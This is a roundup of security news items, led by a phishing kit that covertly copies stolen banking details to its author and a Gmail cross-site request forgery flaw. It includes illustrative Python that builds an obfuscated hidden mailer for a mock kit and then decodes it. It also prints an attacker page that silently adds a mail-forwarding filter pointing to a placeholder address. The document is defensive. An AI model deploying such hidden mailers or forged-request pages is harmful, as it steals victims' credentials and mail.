Phishing kits take advantage of novice fraudsters

A phishing kit targeting Bank of America customers contains an interesting insight into the intellectual hierarchy involved in Internet fraud. At first glance, the kit looks attractive to any fraudster: it is straightforward to deploy on any web server that supports PHP, and a single configuration file makes it easy to specify an email address to receive the captured financial details. In addition to requesting credit card numbers and bank account details, a second form on the phishing site asks for the victim's SiteKey challenge questions and answers, which can help a fraudster gain access to the victim's Internet banking facilities.

[Image bofa-config.png: the email address configured in the phishing kit.]

However, while the phishing kit is easy to use, an obfuscated component within the kit also sends a copy of the captured details to an additional Gmail address, which belongs to the kit's author. This will not be obvious to most fraudsters using the kit, as the relevant code is kept separate from the configuration file and is heavily obfuscated, requiring some effort to decode.

[Image bofa-obfuscated.png: the obfuscated code which sends a copy of the financial details to the author.]

Such deception is a useful tactic for any fraudster who wishes to maximize the number of successful attacks, as the work of deploying the phishing sites and sending the mails is then carried out free of charge by novice fraudsters on behalf of the author. This relieves the author of the more time-consuming aspects of phishing (finding bulletproof web hosting, hacking into host web sites, and sending millions of phishing mails) whilst still receiving mails from each and every deployment of the kit.

[Image bofa-screenshot.png: the phishing kit in action.]
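As an added illustration (not code from the kit described above, nor Netcraft's own tooling), the following Python builds a constructed two-file mock kit whose sending script hides a second recipient behind two layers of eval(gzinflate(base64_decode(...))), then peels those wrappers back and lists every e-mail address found, marking which ones never appear in plain text. The file names, the addresses and the wrapper chain are assumptions made for the example; real kits vary the chain, and only gzinflate, gzuncompress, str_rot13 and strrev are handled here.

```python
import base64
import codecs
import re
import zlib

# --- constructed sample kit (not a real kit) ---------------------------------
# The visible configuration file that the fraudster is meant to edit...
CONFIG_PHP = '<?php\n$to = "fraudster@example.net";\n?>'

# ...and the hidden mailer buried in the sending script, which will be wrapped
# in two layers of eval(gzinflate(base64_decode('...'))).
HIDDEN_MAILER = '@mail("kit-author@example.org", "BofA copy", $msg);'


def _deflate(data: bytes) -> bytes:
    """Raw DEFLATE stream, the format PHP's gzinflate() expects."""
    c = zlib.compressobj(level=9, wbits=-15)
    return c.compress(data) + c.flush()


def php_obfuscate(code: str, layers: int = 2) -> str:
    """Wrap PHP code the way cheap kit obfuscators do (used only to build the sample)."""
    for _ in range(layers):
        blob = base64.b64encode(_deflate(code.encode())).decode()
        code = f"eval(gzinflate(base64_decode('{blob}')));"
    return code


MAILER_PHP = (
    "<?php\ninclude 'config.php';\nmail($to, 'Bank of America', $msg);\n"
    + php_obfuscate(HIDDEN_MAILER) + "\n?>"
)
SAMPLE_KIT = {"config.php": CONFIG_PHP, "mailer.php": MAILER_PHP}

# --- the analysis side -------------------------------------------------------
# Decoders for the wrapper functions such kits chain around a base64 literal.
TRANSFORMS = {
    "gzinflate": lambda b: zlib.decompress(b, -15),
    "gzuncompress": lambda b: zlib.decompress(b),
    "str_rot13": lambda b: codecs.encode(b.decode("latin-1"), "rot13").encode("latin-1"),
    "strrev": lambda b: b[::-1],
}
# Group 1: the chain of wrapper calls; group 2: the base64 literal they wrap.
CHAIN_RE = re.compile(r"((?:\w+\s*\(\s*)*)base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)")
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def unwrap(php: str, limit: int = 50) -> list[str]:
    """Return the source plus every layer recovered by peeling wrappers, breadth-first."""
    layers, work = [], [php]
    while work and len(layers) < limit:
        src = work.pop(0)
        layers.append(src)
        for m in CHAIN_RE.finditer(src):
            try:
                data = base64.b64decode(re.sub(r"\s", "", m.group(2)), validate=True)
                # Apply wrappers inside-out; stop at eval() or anything unknown.
                for fn in reversed(re.findall(r"\w+", m.group(1))):
                    if fn not in TRANSFORMS:
                        break
                    data = TRANSFORMS[fn](data)
            except (ValueError, zlib.error):
                continue  # not a real blob, e.g. an ordinary string literal
            work.append(data.decode("utf-8", "replace"))
    return layers


def find_recipients(kit_files: dict[str, str]) -> dict[str, set[str]]:
    """Map every address in the kit, decoded layers included, to the files naming it."""
    found: dict[str, set[str]] = {}
    for name, src in kit_files.items():
        for layer in unwrap(src):
            for addr in EMAIL_RE.findall(layer):
                found.setdefault(addr, set()).add(name)
    return found


if __name__ == "__main__":
    for addr, files in sorted(find_recipients(SAMPLE_KIT).items()):
        visible = any(addr in SAMPLE_KIT[f] for f in files)
        status = "visible" if visible else "HIDDEN behind obfuscation"
        print(f"{addr:28} in {sorted(files)}  {status}")
```

Run stand-alone it lists both addresses, flagging the author's as hidden because it only appears after decoding. The check worth automating when triaging a kit is exactly that comparison: any address that surfaces only in a decoded layer is one the kit's user was never meant to see, and eval combined with base64_decode is itself a reliable thing to grep for before decoding anything.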

Google Fixes Gmail Cross-site Request Forgery Vulnerability

Google has fixed a vulnerability in its Gmail web-based email service that would have allowed attackers to steal mail messages from users without being noticed.

The attack works by forcing a logged-in user to add a mail filter to their Gmail account, thereby causing their mail to be forwarded to an external mail address controlled by the attacker. Because the Gmail service did not adequately verify the origin of such requests, attackers could create their own web pages that used JavaScript to make such requests automatically on behalf of their victims. In essence, a Gmail user would visit one of these pages and have their account compromised without necessarily realising anything was awry. Only close inspection of the Filters tab in the Gmail Settings menu would reveal what had happened.

[Image gmail.png]

Proof-of-concept exploits used JavaScript to make a silent POST request to the Gmail service and add the attacker's filter. With the response to that request hidden in an iframe, a victim is highly unlikely to notice that their Gmail account has been compromised, particularly while they are browsing a completely different website. Although the attack only succeeds if the victim is logged in, many Gmail users remain logged in throughout the day, which increases the likelihood of success.

The technique used by this exploit is known as Cross-site Request Forgery (CSRF) and is becoming an increasingly common way to attack web applications. If a web application is vulnerable to CSRF, an attacker can carry out arbitrary actions in the context of an authorised, logged-in user of the application simply by getting that user to visit a page under the attacker's control. Not only does this make the attacker's job easier, but it also helps to cover their tracks, as the malicious actions appear to have been carried out, unwittingly, by authorised users of the system.

Compromised webmail accounts are regarded as a valuable commodity by hackers, as they often contain information that would allow an attacker to gain unauthorised access to other systems, such as internet banking, and to harvest credit card details from online stores used by the victim. Because the attacker is now effectively in control of their victim’s email, they could also attack other accounts belonging to the victim by following “forgotten password” links and obtaining the relevant passwords via email.

Cross-site Request Forgery vulnerabilities are often difficult to identify using automated tools and typically require manual testing by security-aware developers. The standard defence is to require, on every state-changing request, an unguessable per-session token that a page on another origin cannot read, and to reject requests whose Origin or Referer header does not match the application's own origin.
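To make the two sides of this concrete, the following is an added Python simulation; it is not Gmail's code and not the proof-of-concept exploit. It models a webmail back end with a "forward to" filter endpoint, a browser that attaches the victim's session cookie to a cross-site form POST while setting the Origin header to the page that submitted it, and two versions of the handler: the vulnerable one, which trusts the cookie alone, and a hardened one, which also demands a matching Origin and a per-session anti-forgery token. The origin mail.example.com, the endpoint path, the attacker page and all addresses are assumptions made for the example.

```python
import hmac
import secrets
from dataclasses import dataclass

APP_ORIGIN = "https://mail.example.com"  # assumed origin of the webmail application

# What the attacker's page does (constructed illustration): an auto-submitting form
# whose response lands in a hidden iframe, so the victim sees nothing.
ATTACKER_PAGE = """
<iframe name="sink" style="display:none"></iframe>
<form id="f" method="POST" target="sink" action="https://mail.example.com/settings/filters">
  <input type="hidden" name="forward_to" value="attacker@example.org">
</form>
<script>document.getElementById('f').submit();</script>
"""


@dataclass
class Request:
    method: str
    path: str
    headers: dict
    cookies: dict
    form: dict


@dataclass
class Response:
    status: int
    body: str = ""


class WebmailApp:
    """Minimal stand-in for a webmail back end with a 'forward mail to' filter."""

    def __init__(self):
        self.sessions: dict[str, str] = {}       # session id -> user
        self.filters: dict[str, list[str]] = {}  # user -> forwarding addresses
        self.tokens: dict[str, str] = {}         # session id -> anti-forgery token

    def login(self, user: str) -> str:
        sid = secrets.token_urlsafe(16)
        self.sessions[sid] = user
        self.filters.setdefault(user, [])
        return sid

    def csrf_token(self, sid: str) -> str:
        """Per-session token that the app's own settings page embeds in its form."""
        return self.tokens.setdefault(sid, secrets.token_urlsafe(32))

    def add_filter_vulnerable(self, req: Request) -> Response:
        # Authenticates on the session cookie alone, which the browser attaches to
        # every request for this site regardless of which page caused it.
        user = self.sessions.get(req.cookies.get("SID"))
        if req.method != "POST" or user is None:
            return Response(403, "not logged in")
        self.filters[user].append(req.form["forward_to"])
        return Response(200, "filter added")

    def add_filter_hardened(self, req: Request) -> Response:
        user = self.sessions.get(req.cookies.get("SID"))
        if req.method != "POST" or user is None:
            return Response(403, "not logged in")
        # Check 1: Origin (or Referer) must be our own origin. Page scripts cannot
        # set Origin, and a missing header fails closed.
        origin = req.headers.get("Origin") or req.headers.get("Referer", "")
        if origin != APP_ORIGIN and not origin.startswith(APP_ORIGIN + "/"):
            return Response(403, "cross-origin request rejected")
        # Check 2: the form must carry the per-session token, which a page on
        # another origin cannot read. Compared in constant time.
        expected = self.tokens.get(req.cookies["SID"], "")
        supplied = req.form.get("csrf_token", "")
        if not expected or not hmac.compare_digest(supplied.encode(), expected.encode()):
            return Response(403, "missing or invalid anti-forgery token")
        self.filters[user].append(req.form["forward_to"])
        return Response(200, "filter added")


def browser_post(handler, page_origin: str, cookie_jar: dict, form: dict) -> Response:
    """A form POST as a browser sends it: the target site's cookies are attached
    automatically, and Origin names the page that submitted the form."""
    req = Request("POST", "/settings/filters", {"Origin": page_origin},
                  dict(cookie_jar), dict(form))
    return handler(req)


def run_scenario() -> dict:
    app = WebmailApp()
    sid = app.login("victim")
    jar = {"SID": sid}                               # the victim stays logged in
    forged = {"forward_to": "attacker@example.org"}  # what ATTACKER_PAGE submits
    vuln = browser_post(app.add_filter_vulnerable, "https://evil.example", jar, forged)
    hard = browser_post(app.add_filter_hardened, "https://evil.example", jar, forged)
    # A legitimate submission from the app's own settings page carries the token.
    legit = {"forward_to": "me@example.net", "csrf_token": app.csrf_token(sid)}
    ok = browser_post(app.add_filter_hardened, APP_ORIGIN, jar, legit)
    return {"vulnerable": vuln.status, "hardened": hard.status, "legit": ok.status,
            "filters": list(app.filters["victim"])}


if __name__ == "__main__":
    print(run_scenario())
```

Run stand-alone it reports the status of each request and the resulting filter list: the forged request succeeds only against the vulnerable handler, and the victim's mail would be forwarded from that point on. Both checks are kept because they fail independently: the token defence breaks if the token ever leaks (for example through a script injection on the same site), while the Origin check is only as good as the browser that sends the header, so an absent header has to be treated as a rejection rather than a pass.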

Hackers Crack Layered Tech Database

Dedicated hosting company Layered Technologies is advising customers to reset account logins after an incident Monday night in which hackers were able to access a client support database. Layered Tech said it doesn't believe that any customer credit card numbers were compromised, but is nonetheless advising customers to change the login credentials on all their servers and underlying services created in the past two years, including webmail, SSH access, MySQL databases and cPanel reseller control panels.

"The Layered Technologies support database was a target of malicious activity on the evening of 9/17/2007 that may have involved the illegal downloading of information such as names, addresses, phone numbers, email addresses and server login details for 5 to 6,000 of our clients," company president Todd Abrams wrote to customers. "Layered Technologies responded immediately to this specific incident by conducting a comprehensive security audit of internal processes and procedures."

P2P Networks Hijacked for DDoS Attacks

Peer-to-peer networks are being hijacked to launch an increasing number of distributed denial of service (DDoS) attacks on web sites, according to security researchers and network service providers. In these attacks, large numbers of client computers running P2P software are tricked into requesting a file from the intended target of the DDoS, allowing the attacker to use the P2P network to overwhelm the target site with traffic.

Attacks of this type were discussed in papers by security researchers last year, but began appearing on the Internet in early 2007 and have accelerated in recent weeks, according to Prolexic Technologies, which specializes in DDoS defense. In a May 14 advisory, Prolexic reported an increase in the number and frequency of attacks. "The rash of large P2P attacks we have seen in the last month is a perfect example of how the DDoS problem constantly evolves," said Darren Rennick, CEO of Prolexic. "Until January of this year we had never seen a peer-to-peer network subverted and used for an attack. We now see them constantly being subverted."

The company said as many as 100,000 machines had been used in some of the attacks. The peer-to-peer DDoSes may be attractive to attackers, as they don't require the use of an existing "botnet" of compromised computers.

U.S. Military Blocks MySpace

The U.S. Department of Defense has begun blocking access to MySpace and YouTube on its network, citing security concerns and the need to prevent the network from being slowed by video traffic. "This is a bandwidth and network management issue," Julie Ziegenhorn, spokeswoman for U.S. Strategic Command, told Stars & Stripes. "We’ve got to have the networks open to do our mission. They have to be reliable, timely and secure."

Many troops stationed overseas use the DoD network to access the Internet, but some others use local providers. Ziegenhorn said the sites were becoming "a drain on the system," but the Stars & Stripes story also mentions security several times. MySpace has been a regular target of phishing scams seeking to steal account credentials. MySpace accounts themselves are of limited value, but can serve as a delivery mechanism for keylogging trojans, capturing home computers that may be used for shopping or online banking as well as social networking. Keylogging trojans would be problematic on computers on a secure military network.

Microsoft Patches Critical MCMS Security Hole

Microsoft's latest security updates include a patch for a security hole in Microsoft Content Management Server (MCMS) discovered by Netcraft's Martyn Tovey. Microsoft update MS07-018 addresses two issues in MCMS, including a cross-site scripting and spoofing vulnerability that was reported to Microsoft by Netcraft.

"The vulnerability could allow the injection of a client-side script in the user's browser," Microsoft notes in its summary. "In a Web-based attack scenario a compromised Web site could accept or host user-provided content or advertisements which could contain specially crafted content that could exploit this vulnerability. The script could take any action on the user's behalf that the Web site is authorized to take. This could include monitoring the Web session and forwarding information to a third party, running other code on the user's system, and reading or writing cookies."

Microsoft Content Management Server allows developers to build complex web sites atop the .NET framework, and is typically used to manage enterprise portals and e-commerce sites. Many of the functions of MCMS 2002 have been integrated into the Office SharePoint Server 2007 product. MCMS continues to be widely used, and was found on more than 5,000 sites last year.

Netcraft provides a Web Application Testing service that rigorously tests the defenses of Internet networks and applications. It is part of the Audited by Netcraft service, which provides a range of advanced Internet security tests.